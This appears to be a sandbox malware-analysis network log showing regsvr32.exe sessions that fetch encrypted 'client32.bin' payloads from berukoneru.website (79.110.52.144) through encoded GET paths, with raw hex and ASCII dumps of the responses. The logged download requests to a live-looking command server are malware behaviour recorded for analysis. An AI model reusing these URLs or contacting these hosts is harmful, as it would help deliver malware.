                          2021-12-14 09:34:07 UTC210INData Raw: fa 20 1c 7c 43 17 ce 86 db 4b 72 bb 94 ee 48 40 4a bf 8f e9 2c 5b ea 47 de 7c 6b a3 c0 07 1f 75 79 27 cc 4f 13 37 db a0 64 75 67 27 44 06 94 62 3d 48 9c 68 d9 61 6a d0 2d 9f ee c4 99 6b 5a 7d 2a a8 7a 61 02 68 25 2e c6 05 51 2c 3c a9 d0 f0 20 85 44 a0 e6 75 44 05 09 0e dd 6b 40 f5 0c ce c8 32 78 62 bd 18 eb 3e 4d 07 dc 11 a7 92 4b 99 b7 54 f2 b2 a3 c0 bd 2f 2f bb 85 f4 79 21 4e 8a 91 19 e7 51 35 57 c0 6f a3 24 4c ae e7 9e 1e 57 97 af c0 d4 8c 8a a3 d6 1f 7b 9d ea 00 e4 b0 ae 58 7b 98 80 a4 dd 02 0b b3 21 6b bc 98 e8 6c 18 52 6e 44 78 cc 7a d2 a1 31 6d 95 8a fa 0f 47 53 3d 0b 4d 9d ec 4c 7e b4 b0 00 bd f5 32 ca 9d f6 39 81 49 d4 cc 67 7f 5a b6 d3 b9 57 bc 88 c3 3a 69 5b 38 95 b8 75 a0 6c 39 1d b3 3e a0 ea 5f ef 54 dc 14 77 c6 d3 27 4d f2 5c a7 2f a6 4b 56
                          Data Ascii: |CKrH@J,[G|kuy'O7dug'Db=Hhaj-kZ}*zah%.Q,< DuDk@2xb>MKT//y!NQ5Wo$LW{X{!klRnDxz1mGS=ML~29IgZW:i[8ul9>_Tw'M\/KV
                          2021-12-14 09:34:07 UTC226INData Raw: 37 0d 4a 26 07 ef 84 99 04 24 2d d2 a5 97 36 90 06 1e 40 0c 13 97 05 8d 3b 48 a0 1c bb fe bc 13 9a 21 57 ed df 3c 3f 87 73 02 40 da c3 75 75 da ba aa ab 65 d7 2e 68 08 03 ed ec 4a cd 55 ff 67 38 b6 c0 52 54 a2 5d 4f 34 7a 36 15 b6 f6 f9 19 e7 4b 6e de 07 dd 3f 2b f2 13 e4 40 c8 ca 33 08 92 fe 08 fe e9 24 06 60 04 d0 0f 80 64 2b 5a a4 af 11 ce 4d f0 83 94 21 95 58 75 b0 3a c5 0a 41 74 e5 d1 e6 cb ec d1 10 5a 97 cb 53 54 a0 d5 ff 8e ff cf 43 1c 6d 25 74 5c 1e 50 84 cc 16 14 ca 08 55 7d 40 cb cd 5f 28 dc 06 33 e3 4e 6f 46 14 3f 23 4a 56 c8 49 5a 7e 53 fc 32 ea b7 a4 56 cb 32 1c 95 b2 42 66 98 99 8f 28 a1 88 6e 03 94 d3 7f 10 de 93 62 15 b7 57 7d d0 e0 68 3d e5 9f 59 38 d9 15 ef 9b a0 99 be 42 e4 8a 9d a3 22 55 fd eb 57 2d 41 2e 20 52 7e be e1 57 37 58 7b 93
                          Data Ascii: 7J&$-6@;H!W<?s@uue.hJUg8RT]O4z6Kn?+@3$`d+ZM!Xu:AtZSTCm%t\PU}@_(3NoF?#JVIZ~S2V2Bf(nbW}h=Y8B"UW-A. R~W7X{
                          2021-12-14 09:34:07 UTC242INData Raw: ec 62 9f bc 1d 37 03 80 a9 34 02 cc a6 41 79 a3 1a aa aa aa bf 89 76 05 07 2a 3d 9e 07 aa 5a bd ed ce ff e2 a8 49 49 0e f0 3f c2 12 d5 e1 11 27 72 23 00 77 a4 f5 70 d5 7e d5 36 4b 3b 8c d0 57 5e e2 28 b4 7f 5d 0f ca 46 26 f0 0b 1c f1 a6 c9 b9 66 d7 05 bf 83 4c 8f 4c 75 7a 0f 3a 42 17 db a5 88 a8 6d 2b 54 ae ce 4d a9 0e 7d c1 b5 69 64 34 ce 02 aa ae 23 fe cb 06 a1 c5 8a 8f 95 f9 f6 de 29 90 30 08 46 90 be 1b eb 4f 9c bd d5 3d ef 91 29 52 0e 14 d0 37 45 29 2f de 63 c2 30 a3 f4 b5 96 a1 e5 15 04 64 42 10 2b 99 49 f6 ff ff 19 23 b8 d8 a0 37 bd 58 97 d7 4b 7c 44 c8 c3 b1 f8 47 ce 61 64 d1 a0 18 84 3f 92 6a 72 0a 59 0d 9b c9 c1 7d 5a a3 2f ef 44 db b8 a3 d5 9f 5f 5d 01 71 77 bb 91 3e 30 ce 3f cf 91 ab c0 56 da 5f 51 ed 2f f4 de de a3 17 d5 96 94 1a 34 bf 6c 83
                          Data Ascii: b74Ayv*=ZII?'r#wp~6K;W^(]F&fLLuz:Bm+TM}id4#)0FO=)R7E)/c0dB+I#7XK|DGad?jrY}Z/D_]qw>0?V_Q/4l
                          2021-12-14 09:34:07 UTC258INData Raw: 74 64 30 2b 47 63 05 4e 1a 92 63 4d 88 49 ac 7b 18 e6 66 8d c0 25 d7 7e d9 11 1b 4f 63 60 d7 26 d1 40 d4 34 6e 34 3d 4b 92 e5 d7 a5 9a 3d e3 aa 8b 11 69 45 06 e0 eb dd 13 3b e4 ab 18 fa 5c e3 62 7f 93 bc 12 14 64 16 dd 5a 06 be 89 69 5e 65 ff 7b 27 50 76 26 a1 36 18 4a bf 41 83 8d 32 53 95 00 1e ee 73 11 c9 fb 9d 51 90 3a 39 5a 7b a5 4a 90 93 75 60 b4 a8 34 90 7a 6d e3 26 5d 01 e1 15 2f 75 14 56 2d 3e a3 51 8f 13 c2 d9 a7 d4 f2 74 ac 31 a0 07 61 96 4d e9 74 71 23 a4 75 5c 5f c5 4b 90 38 27 65 6f ef e5 aa 73 dc 30 d3 59 85 05 15 2f 5b 84 86 e4 52 3c 0e a8 bf 8c d0 00 60 7e bd 0d 42 8d 07 ee 5f d2 2a 60 c1 45 57 83 62 9f e1 79 14 87 dc 39 aa 2a 84 fe b0 c0 04 7c 32 47 0d 59 ca 53 c0 a9 0e 70 52 d7 a6 6c b7 d2 50 27 75 f0 af b5 ff ed 71 b5 9e d0 98 b3 70 c0
                          Data Ascii: td0+GcNcMI{f%~Oc`&@4n4=K=iE;\bdZi^e{'Pv&6JA2SsQ:9Z{Ju`4zm&]/uV->Qt1aMtq#u\_K8'eos0Y/[R<`~B_*`EWby9*|2GYSpRlP'uqp
                          2021-12-14 09:34:07 UTC274INData Raw: 06 de ca b6 3b 58 d5 62 cc 8a fb 45 76 21 95 c0 b7 2c 97 8f 7a 17 6a ac dd 76 32 14 48 19 d0 f7 c1 ee d3 57 60 bd a5 93 62 80 9a af 88 21 6c f2 8b 96 f0 d2 d3 34 b0 93 6b e1 52 c5 e0 b9 09 dc 24 7a bd f8 df 67 a9 25 54 e7 de 5c 27 67 d5 fa 59 28 f5 37 6f d4 a7 77 ef 33 f7 a0 57 23 35 bf 1f 26 2f 21 24 2e ac 08 73 bb a6 cc 3e d8 4b 4b fb c3 f7 81 12 0a 84 64 e0 0f 53 9a 23 a7 71 ae d5 f0 ee 0d 75 e0 23 cf 60 07 52 87 2c 23 56 b9 be df 5e 73 1f 46 f8 26 c6 6e c1 c4 ac a0 81 94 36 a2 86 82 0a fc c3 93 e8 ec e7 f6 54 24 ad 75 ad b1 8e ee ec a4 90 7d ee 8b 09 c2 b8 57 51 ba b0 ea 34 67 e2 87 bf 0c 2d 47 77 a1 62 67 a6 0c 1b a3 9e 8c 2f f0 90 c7 cd 2d ac 34 88 21 79 00 a9 d9 15 ae 14 e7 9c 74 d0 c8 de e0 b0 7e 94 ae f8 af a3 a6 cd cc a7 9f f4 c4 d3 b0 23 7c 41
                          Data Ascii: ;XbEv!,zjv2HW`b!l4kR$zg%T\'gY(7ow3W#5&/!$.s>KKdS#qu#`R,#V^sF&n6T$u}WQ4g-Gwbg/-4!yt~#|A
                          2021-12-14 09:34:07 UTC322INData Raw: 1a 8b 8a c2 67 70 7e 71 54 68 79 73 a5 4e ab e3 4a b0 c0 35 cc 84 e5 09 8a 2d d4 b3 61 5c 7c a2 69 40 6d 93 fe 19 95 f1 37 72 e3 a4 cc e1 46 00 36 ad 08 70 09 48 ee df 28 59 f1 dc 84 d8 a6 88 9b 81 17 8e ac 5a 38 1e e3 b0 2c 58 88 bc 3c cc a0 d1 3f c9 e2 cd 71 82 5a a1 c4 49 0c ab e1 5d d1 4f 54 3c 7d a2 ed c9 e0 f5 88 65 0a 91 c0 51 f6 39 73 4c 95 3f e6 b4 ce f9 ff 68 3d da 15 d4 a3 b5 3e 9b f4 35 b5 15 04 36 86 d2 ec 26 ef ad 43 d2 da 21 a2 d9 f4 d3 7e 4c 68 aa bd 8e 8c d2 db 21 9d 03 68 fe f0 e3 c2 17 82 dc 14 81 fc 68 d1 32 7e 48 88 4d 6d a1 89 03 19 4f 65 74 d5 22 c5 7b 46 5c 8e e0 12 37 09 9f 86 e4 8c 00 7a 9c 9e 4c 98 c5 39 45 26 d1 e9 44 94 ff c8 ca 5c a2 f4 33 0d 2a aa 1f d3 4c 1c 0c 3f f3 08 7b a3 eb 7b e7 59 b5 5b bf cb 25 9b 11 72 93 d9 2d e6
                          Data Ascii: gp~qThysNJ5-a\|i@m7rF6pH(YZ8,X<?qZI]OT<}eQ9sL?h=>56&C!~Lh!hh2~HMmOet"{F\7zL9E&D\3*L?{{Y[%r-
                          2021-12-14 09:34:07 UTC338INData Raw: 33 c3 d5 ab 38 83 31 57 4d b0 0c 3c fc 3e 4f d3 9b 72 a3 e4 0c 6c 08 2f ff a4 6c 6a df b6 8c 7b 24 68 b0 0e d2 05 e2 f9 41 46 ca 15 b9 b7 02 0c e3 58 ba 11 31 8b ba 02 3a 0c 84 d5 36 ab 65 24 1f f9 e2 0f 83 47 9a 22 6f 31 de 9f 0f 48 b3 c9 db f9 ab 1d 27 e9 c5 83 98 15 d7 6c 93 b7 0e ed 5f c9 d9 03 df 84 ce 07 03 28 39 eb db c4 21 50 9c 97 90 2c 76 af c5 99 4a 54 f4 ba 0b 5d 24 61 50 81 c0 d8 7d 07 a2 e1 6b 26 5f 8b 7c 88 95 2c 76 4f d0 70 dd 80 88 86 50 b0 40 ad 95 3b 12 bc 72 7c d5 0a 64 6a 9b 5a 3c f4 3f 02 57 75 f9 dc 0a 2e ff 75 10 53 d2 85 61 8f 3f 50 d0 35 57 1d 0c 50 9d e4 f5 fd 6c 84 5d 36 96 76 96 d2 ff 6f b3 fd 55 53 1a c3 bf 4b b6 27 2d e6 3c 55 80 81 fc 5e 8c 97 1a f2 df 24 a3 b6 a9 d1 ef 67 e5 8d 7a 95 79 f4 9d 6e 17 78 d6 28 d0 4a 03 fb b4
                          Data Ascii: 381WM<>Orl/lj{$hAFX1:6e$G"o1H'l_(9!P,vJT]$aP}k&_|,vOpP@;r|djZ<?Wu.uSa?P5WPl]6voUSK'-<U^$gzynx(J
                          2021-12-14 09:34:07 UTC354INData Raw: 36 0c 6a 47 30 19 9c 4e 22 85 cb 33 b8 3c 86 72 6e eb c2 7f 61 f3 63 c9 32 ed 9a 6c 4e 71 21 a3 96 09 5b 1b f6 91 d8 af 7f 12 2f 29 bb 70 ab 1e 8f 4e 86 79 ad f6 43 a3 93 18 7d 1f cd c9 74 b0 36 46 e2 59 f2 66 4d 73 8d 51 79 81 72 ed e3 8b 3b 3c f9 23 bf 04 38 63 7f ed 81 2c 3c 66 e8 4d 85 47 dd da 40 0d f8 54 73 09 8e e5 8d 8d 56 86 3b 42 a5 20 c3 4d 3d 63 e6 81 2e d5 06 d0 40 d4 9b 0d 1b 77 b1 b5 59 66 f4 f3 d3 f0 a4 6a 03 8b d6 85 61 23 74 bb b4 54 a1 fa 5a 96 88 0d 48 0c 10 fc a7 55 bb fe 20 0d e3 f2 af 1a c5 61 fe 3f d1 72 04 af a2 d5 4c 24 76 71 d3 2c 1d 01 cc 92 44 5b b1 61 ea 2f e9 d5 61 5a c7 1d 6f 06 ad 68 4f d1 aa c8 64 89 7c 2f a9 56 0d 9e 5a 98 51 aa 2c 0b 5d 83 9b 9f 16 c2 e5 71 51 02 ea cc 84 39 90 e7 3b ce f7 eb ee e7 16 20 5a 10 d9 b7 22
                          Data Ascii: 6jG0N"3<rnac2lNq![/)pNyC}t6FYfMsQyr;<#8c,<fMG@TsV;B M=c.@wYfja#tTZHU a?rL$vq,D[a/aZohOd|/VZQ,]qQ9; Z"
                          2021-12-14 09:34:07 UTC370INData Raw: f2 e5 3a cd 32 2d ed 92 9d 3f 9d f5 64 8d 06 c5 e4 93 7f 3e 78 36 95 1c 30 12 88 9a 97 7e 9b 10 03 a4 d9 d5 b1 65 9e 77 c5 87 e2 43 68 be db 1f 8e 2e a5 55 62 3c ec df 5b 5e a5 61 b7 69 0c ae ee 83 66 7a f5 00 74 70 c2 44 a6 a0 92 0c 66 fa b1 20 92 77 bf 47 29 d0 51 4a 32 10 65 09 54 81 4f ca 93 25 3b c8 e6 6b f3 3d 7d 97 d1 00 ae 70 9d 06 59 3e 67 79 35 74 ea a1 ac 3c 5d 64 44 b3 02 ea 1a ec 16 0e 15 85 65 8c 11 2a 09 43 5a ad 8a 26 10 f6 44 b8 5c 39 ac e8 dc 38 55 3d 16 98 7a 7d 69 fb c6 57 64 49 89 04 01 eb bc 13 9b d2 51 58 5b b1 c4 77 7c 6c b9 4d 8e af 08 97 af 13 96 8a 13 dc 5b 85 ee 1d d9 f1 cb 2e 8d 50 2f 90 1a 74 47 9d 82 de ef bb d5 4b 2a 1c 36 7f f6 20 e8 e6 00 2f 63 53 d2 32 c8 6f 20 15 e4 5b ee d7 c5 b4 29 0f ad c9 4a db d2 7e b9 b1 d9 bf 4a
                          Data Ascii: :2-?d>x60~ewCh.Ub<[^aifztpDf wG)QJ2eTO%;k=}pY>gy5t<]dDe*CZ&D\98U=z}iWdIQX[w|lM[.P/tGK*6 /cS2o [)J~J
                          2021-12-14 09:34:07 UTC386INData Raw: 20 73 2e 57 0e da 3c 5f 79 54 cf f8 d9 3a ac c6 dd 9b d7 a4 39 61 8d 95 a4 49 72 7c 27 f5 8b 31 15 bb b1 a4 98 cd 3b 78 40 00 11 29 d8 f3 40 3f e5 24 c7 d0 44 db 15 b8 d0 20 72 e0 9d 97 4a eb ec 4c 78 60 b4 20 69 c7 26 d6 35 1e de 8d c2 21 c5 97 6d 4b a5 c3 49 16 5b d8 a6 e0 0f f2 84 9c d1 79 c0 82 53 97 59 e0 08 c2 cf 30 12 b5 5c 01 b9 dd c2 ee c3 36 24 f8 c7 cb e1 8a c7 fc 03 78 4b 1d ee 0a 44 0a 49 e0 cf 70 92 83 7c e4 ea 46 eb b2 dd eb 84 d1 99 14 0d de f8 64 26 f1 4b 89 99 b9 8e 38 6f 50 7d c3 4d a3 5a 10 f5 76 a0 20 0d 92 21 d1 72 f9 e7 a4 63 ff d0 b6 6b 3d b8 b2 cb 9f 53 83 29 ca db b3 aa f0 99 4c c0 77 df 06 d3 91 a4 f3 f3 97 a2 4b d3 ef 25 5c 44 cb 53 4b 0c 61 51 72 38 97 7d aa 8f 25 bb 4f 4d e7 f3 1b 93 67 be 35 a7 6d 10 26 d0 e9 75 49 03 9b fe
                          Data Ascii: s.W<_yT:9aIr|'1;x@)@?$D rJLx` i&5!mKI[ySY0\6$xKDIp|Fd&K8oP}MZv !rck=S)LwK%\DSKaQr8}%OMg5m&uI
                          2021-12-14 09:34:07 UTC402INData Raw: 36 19 cd 54 79 36 2b 6b 10 11 75 b0 3e 40 37 97 94 7d b3 d1 b3 ee 09 71 72 a8 16 9f 4c 06 27 52 09 90 a7 65 25 a4 a4 57 68 42 27 dd 6a 76 21 5f b3 5f 82 fe 88 df 67 74 1f 96 b4 23 a0 83 08 c2 ae 2d 1b fc ae e5 20 42 94 8a d8 7b d9 9b cf c3 7d 90 4b c0 21 97 33 34 d0 18 df fd d8 62 17 9d 9f 04 23 01 17 72 ad d8 e3 c8 36 ab ab 9c 6d a6 22 8a 34 fe 50 67 53 c5 95 c5 00 5e 38 04 78 1c ea fa f3 22 1e 4b 90 85 1f bb 19 f3 e4 1a 2e 5a d5 ee 09 ea 8a 92 12 37 4d 76 8c 5e 86 9a f6 0f 83 42 3d 9c 00 f1 3f 0a b2 7c 5a 8b 07 84 14 3c ee 7d ba 94 3d 04 25 74 dd 76 52 55 08 a3 7a 93 c7 7a 1d ab 8d 97 0e 87 eb b0 78 a9 b1 ef 0f 66 80 8a a6 12 cd 21 8a d8 66 2c bb 2d 78 c2 f3 b8 a0 53 6a 08 0a 6f d7 94 8a 1c 08 1b f7 0c 22 8d 33 21 1c 41 72 82 67 54 6c 50 cb 57 a0 17 74
                          Data Ascii: 6Ty6+ku>@7}qrL'Re%WhB'jv!__gt#- B{}K!34b#r6m"4PgS^8x"K.Z7Mv^B=?|Z<}=%tvRUzzxf!f,-xSjo"3!ArgTlPWt
                          2021-12-14 09:34:07 UTC418INData Raw: 0e 82 3b 28 5c 8a 23 f3 fe ac ea 89 97 4f fd 45 07 36 35 55 85 5f e4 c1 68 4d fa b0 54 a3 22 04 98 4f c7 b5 8d 23 7d b2 61 b6 31 34 20 b7 1b a4 d9 42 0b 7e 84 3a ce e7 2c 38 36 17 77 e7 e4 fc 2c 65 16 40 a0 54 34 a1 13 8a 38 48 80 ff 35 49 57 af 87 44 9a 1f fc e5 4c 13 ed 3a 2b e0 e7 ce 29 ed f9 71 81 2e b2 3f 69 f0 38 cd 38 b1 59 2a 92 fb 5c 83 29 11 0a e0 7b 1c 3f d2 c4 55 e4 71 e3 3c b5 7d 97 37 f4 89 35 3e 2a 90 9a 16 31 29 0e b4 2a 40 26 4c aa 45 d5 c7 d8 27 6a 16 b1 9a 67 61 41 a1 1a ba 9f 70 6e 9e e9 48 f7 c2 cc 52 c9 00 75 56 16 a2 d2 83 54 8f f5 d3 27 87 8d e6 67 d7 b0 37 8c b1 38 87 6b 58 e8 12 fe ec 00 2d fd 70 73 31 4e 6a 42 32 85 39 f6 e8 5b 9a 34 07 d7 bd 73 ea cc e2 da f0 8c 8d 5c ca 99 14 9d fd ba a1 e0 ed 4d 03 be 96 69 17 e0 56 c7 1f 7f
                          Data Ascii: ;(\#OE65U_hMT"O#}a14 B~:,86w,e@T48H5IWDL:+)q.?i88Y*\){?Uq<}75>*1)*@&LE'jgaApnHRuVT'g78kX-ps1NjB29[4s\MiV
                          2021-12-14 09:34:07 UTC482INData Raw: a0 19 9a db e6 23 d3 03 86 6f 75 af 47 d5 3f 20 85 14 19 0e b9 d4 63 8c fd 8a 9a af a9 f6 65 42 84 ce cc f3 73 04 88 70 20 03 2e 2d 3a f5 0f cf 45 fe 85 b5 60 0f 38 e4 0f 37 bc bf 4d f6 2c 45 a8 31 d4 65 37 db a7 ee c6 e6 95 0e bc 4a 8a 34 9d a4 0d 59 51 52 14 5c c1 0f 3c ec 47 b1 68 4c 80 4c 71 0c 20 bb b6 5b 7b d7 49 8d 03 7d d5 bb ae cc 8b d0 d0 02 e9 5a 65 53 ae 1e 2c a6 43 6e e2 1e c5 78 ff 67 8f f0 0d d1 d9 1e 13 2c a2 1d df 57 0b e7 72 4f c1 4e fd ee 99 04 21 c1 02 12 96 53 77 8d aa 83 93 27 ff a3 34 86 54 2e 18 ab 65 1d 56 65 e7 f0 fa 9f 11 fb 79 79 cc 44 ad 4a 13 67 7c 78 91 1b 35 3c f6 1d 35 63 f5 35 af 82 78 1c 11 a5 0d 76 24 5c 35 8e 9a 62 ca eb d1 dc 7d 1a a1 82 c4 f1 29 ea 1f 1c 46 3e 42 d1 69 f2 f0 01 dd e9 6b 1b 07 ff 17 68 ac d1 b5 48 8c
                          Data Ascii: #ouG? ceBsp .-:E`87M,E1e7J4YQR\<GhLLq [{I}ZeS,Cnxg,WrON!Sw'4T.eVeyyDJg|x5<5c5xv$\5b})F>BikhH
                          2021-12-14 09:34:07 UTC498INData Raw: 15 93 b0 c9 e5 45 68 a6 ac b4 73 14 04 8b d2 73 37 da 94 58 af 8c 71 a1 da 98 2f 7a 5f 00 68 57 45 4d 6b 23 a3 df ac b7 08 22 c0 21 92 9d 91 8b 92 62 0b c1 a4 d9 31 21 b2 82 fc 16 c3 c2 2c e6 f2 c9 7b 9e ed 62 e8 b1 c5 94 41 f1 99 7a db 30 24 96 ba 10 ac d7 87 21 08 bd c6 d3 02 47 9e 4d 19 3c 56 18 b8 86 af af 82 b6 d8 04 fc 7b 26 3f 88 0f 78 4b de 4d cd 3d 2d 67 48 53 e0 e8 f4 57 ba fb ab 11 65 6b 3f 5a 74 66 d8 6f cd a5 55 54 84 d7 84 2a 96 f0 7b ba fb 3a 40 ae 9a 7e 21 6d 09 fa 90 30 cc af f9 65 a6 50 8e 9b d2 63 fb a0 1f ac 48 d8 90 99 cc 91 db b9 d3 5a f0 df 5d f6 67 0a fc a1 83 ac 70 74 61 2d 1d 54 6f de e8 e2 75 10 9c ed a3 3d b9 89 38 fd 44 93 dc bb be 2a ee 11 5f 06 2e 3b 9d 7d 2a 31 15 93 0e c2 16 3f a1 08 92 6c 38 1e dc 9a b9 14 3b 62 e8 ab b8
                          Data Ascii: Ehss7Xq/z_hWEMk#"!b1!,{bAz0$!GM<V{&?xKM=-gHSWek?ZtfoUT*{:@~!m0ePcHZ]gpta-Tou=8D*_.;}*1?l8;b


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          10192.168.2.54980779.110.52.144443C:\Windows\SysWOW64\regsvr32.exe
                          TimestampkBytes transferredDirectionData
                          2021-12-14 09:34:08 UTC1895OUTGET /tire/o4Wh2yGKlAclIXiSKni/E2GRbJwAfyjZDLvIiDUTZP/MYjyQpBnAiuxp/RCS8IZuc/T6rd9RjJyTuIO59AdkBUbyh/AeLhgjzVcK/R628sGYn00PGPEGL1/qe_2FhyY_2B4/KAdwjy0pLGn/wY1nXPl9lZfHBx/mKriUsf47w97_2F05n24c/_2B3uV0T1ULXF_2F/rws1Po8g_2B5W/rqgHz.eta HTTP/1.1
                          Cache-Control: no-cache
                          Connection: Keep-Alive
                          Pragma: no-cache
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: berukoneru.website
                          2021-12-14 09:34:08 UTC1896INHTTP/1.1 200 OK
                          Server: nginx/1.20.1
                          Date: Tue, 14 Dec 2021 09:34:08 GMT
                          Content-Type: application/zip
                          Content-Length: 1869
                          Connection: close
                          X-Powered-By: PHP/5.4.16
                          Set-Cookie: PHPSESSID=9pokd33d23ohcifgffqmh7mjg6; path=/; domain=.berukoneru.website
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: public
                          Pragma: no-cache
                          Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:08 GMT; path=/
                          Content-Transfer-Encoding: Binary
                          Content-Disposition: attachment; filename=client32.bin
                          2021-12-14 09:34:08 UTC1896INData Raw: a1 e8 4e 39 d8 b2 11 ec 16 ab 59 67 3a eb be 41 8e d7 95 21 5e 96 1a 46 72 fd 57 3a 49 c4 80 6c 33 39 f9 45 a2 84 bd 4e e5 18 0f 14 dd 3b 3b 58 0c 09 c6 a5 b8 56 34 db b1 5a 48 a4 05 d2 a0 f5 2e 63 af 64 57 86 5b 2c 8e d6 87 1c 9b e4 6e f0 15 94 49 8a 70 8c cf 96 33 5c 46 98 eb cb 4d 6e 34 72 48 75 c6 13 a9 9b b5 1a cc ea 3c 49 4d c4 45 28 c6 8f 9b ea 4d 8e 90 a8 24 3e 52 52 b8 7d 9e 51 45 2d a5 19 6b fe 47 ac e1 f2 70 a1 54 ac c9 69 f9 2b 68 af e0 ab fc f4 d3 a0 26 74 33 99 1e 08 42 1f 07 52 4d d0 14 4c ec d9 f8 e7 7a 59 30 d0 37 a6 84 0c e4 6c 5a f0 8b 90 0f 17 4e 29 70 b6 b3 93 ec 05 72 a4 a2 b0 a2 df 37 ef 86 4d 32 f1 ed 1e 7a 7b 97 c7 49 b4 1a a9 5e 07 c1 14 8c 05 07 02 41 d6 7e 01 94 fe 16 34 37 d5 2d 1b 6b 4d fe 9c 9d e0 f2 53 c1 29 b9 7e 93 c4 91
                          Data Ascii: N9Yg:A!^FrW:Il39EN;;XV4ZH.cdW[,nIp3\FMn4rHu<IME(M$>RR}QE-kGpTi+h&t3BRMLzY07lZN)pr7M2z{I^A~47-kMS)~


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          11192.168.2.54980879.110.52.144443C:\Windows\SysWOW64\regsvr32.exe
                          TimestampkBytes transferredDirectionData
                          2021-12-14 09:34:08 UTC1898OUTGET /tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6ImzPG/nqeMvnB_2B/0lgxK72Q_2BWOlTx_/2BHVUq8DywzL/dSOEptmJdkD/639IuGSCq9GXlR/PUHxRfZnx0Of7xPsoVOC_/2FTMAnj0YKLpX9By/omZGYbxoocAN6vP/PuGPVsc2wwxbBsmHOU/YqsK1vpPn/dCIkRouQqQLmE/5L.eta HTTP/1.1
                          Cache-Control: no-cache
                          Connection: Keep-Alive
                          Pragma: no-cache
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: berukoneru.website
                          2021-12-14 09:34:08 UTC1898INHTTP/1.1 200 OK
                          Server: nginx/1.20.1
                          Date: Tue, 14 Dec 2021 09:34:08 GMT
                          Content-Type: application/zip
                          Content-Length: 1869
                          Connection: close
                          X-Powered-By: PHP/5.4.16
                          Set-Cookie: PHPSESSID=0egjoe75dvn618qck4vl9caql1; path=/; domain=.berukoneru.website
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: public
                          Pragma: no-cache
                          Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:08 GMT; path=/
                          Content-Transfer-Encoding: Binary
                          Content-Disposition: attachment; filename=client32.bin
                          2021-12-14 09:34:08 UTC1899INData Raw: a1 e8 4e 39 d8 b2 11 ec 16 ab 59 67 3a eb be 41 8e d7 95 21 5e 96 1a 46 72 fd 57 3a 49 c4 80 6c 33 39 f9 45 a2 84 bd 4e e5 18 0f 14 dd 3b 3b 58 0c 09 c6 a5 b8 56 34 db b1 5a 48 a4 05 d2 a0 f5 2e 63 af 64 57 86 5b 2c 8e d6 87 1c 9b e4 6e f0 15 94 49 8a 70 8c cf 96 33 5c 46 98 eb cb 4d 6e 34 72 48 75 c6 13 a9 9b b5 1a cc ea 3c 49 4d c4 45 28 c6 8f 9b ea 4d 8e 90 a8 24 3e 52 52 b8 7d 9e 51 45 2d a5 19 6b fe 47 ac e1 f2 70 a1 54 ac c9 69 f9 2b 68 af e0 ab fc f4 d3 a0 26 74 33 99 1e 08 42 1f 07 52 4d d0 14 4c ec d9 f8 e7 7a 59 30 d0 37 a6 84 0c e4 6c 5a f0 8b 90 0f 17 4e 29 70 b6 b3 93 ec 05 72 a4 a2 b0 a2 df 37 ef 86 4d 32 f1 ed 1e 7a 7b 97 c7 49 b4 1a a9 5e 07 c1 14 8c 05 07 02 41 d6 7e 01 94 fe 16 34 37 d5 2d 1b 6b 4d fe 9c 9d e0 f2 53 c1 29 b9 7e 93 c4 91
                          Data Ascii: N9Yg:A!^FrW:Il39EN;;XV4ZH.cdW[,nIp3\FMn4rHu<IME(M$>RR}QE-kGpTi+h&t3BRMLzY07lZN)pr7M2z{I^A~47-kMS)~


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          2192.168.2.54979779.110.52.144443C:\Windows\SysWOW64\regsvr32.exe
                          TimestampkBytes transferredDirectionData
                          2021-12-14 09:34:07 UTC209OUTGET /tire/fGFKjH5BjbdZz4tmUO5m/ZAUfPXxElw8Dkm9Cfh9/xqmrK6ieQrOr54I1y1Md2B/CJZjvCZRXK_2B/c6YLK40A/ibGCXB5z8qRJaf9iUFEBazW/9sEXIVndb3/DsRsV2z8TCrjx7mBI/rTZxp021lQBU/ESMggS1gJ_2/Bi3Bcj9_2B8Xf4/Xr9j2PgVhY9_2FzIeDatB/WE3DM_2B4ZBLmr9g/bExshi993/JbJC0wJJ/U.eta HTTP/1.1
                          Cache-Control: no-cache
                          Connection: Keep-Alive
                          Pragma: no-cache
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: berukoneru.website
                          2021-12-14 09:34:07 UTC290INHTTP/1.1 200 OK
                          Server: nginx/1.20.1
                          Date: Tue, 14 Dec 2021 09:34:07 GMT
                          Content-Type: application/zip
                          Content-Length: 213639
                          Connection: close
                          X-Powered-By: PHP/5.4.16
                          Set-Cookie: PHPSESSID=6e2b9843h042p8pk0q33ujpg11; path=/; domain=.berukoneru.website
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: public
                          Pragma: no-cache
                          Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                          Content-Transfer-Encoding: Binary
                          Content-Disposition: attachment; filename=client32.bin
                          2021-12-14 09:34:07 UTC290INData Raw: fa 20 1c 7c 43 17 ce 86 db 4b 72 bb 94 ee 48 40 4a bf 8f e9 2c 5b ea 47 de 7c 6b a3 c0 07 1f 75 79 27 cc 4f 13 37 db a0 64 75 67 27 44 06 94 62 3d 48 9c 68 d9 61 6a d0 2d 9f ee c4 99 6b 5a 7d 2a a8 7a 61 02 68 25 2e c6 05 51 2c 3c a9 d0 f0 20 85 44 a0 e6 75 44 05 09 0e dd 6b 40 f5 0c ce c8 32 78 62 bd 18 eb 3e 4d 07 dc 11 a7 92 4b 99 b7 54 f2 b2 a3 c0 bd 2f 2f bb 85 f4 79 21 4e 8a 91 19 e7 51 35 57 c0 6f a3 24 4c ae e7 9e 1e 57 97 af c0 d4 8c 8a a3 d6 1f 7b 9d ea 00 e4 b0 ae 58 7b 98 80 a4 dd 02 0b b3 21 6b bc 98 e8 6c 18 52 6e 44 78 cc 7a d2 a1 31 6d 95 8a fa 0f 47 53 3d 0b 4d 9d ec 4c 7e b4 b0 00 bd f5 32 ca 9d f6 39 81 49 d4 cc 67 7f 5a b6 d3 b9 57 bc 88 c3 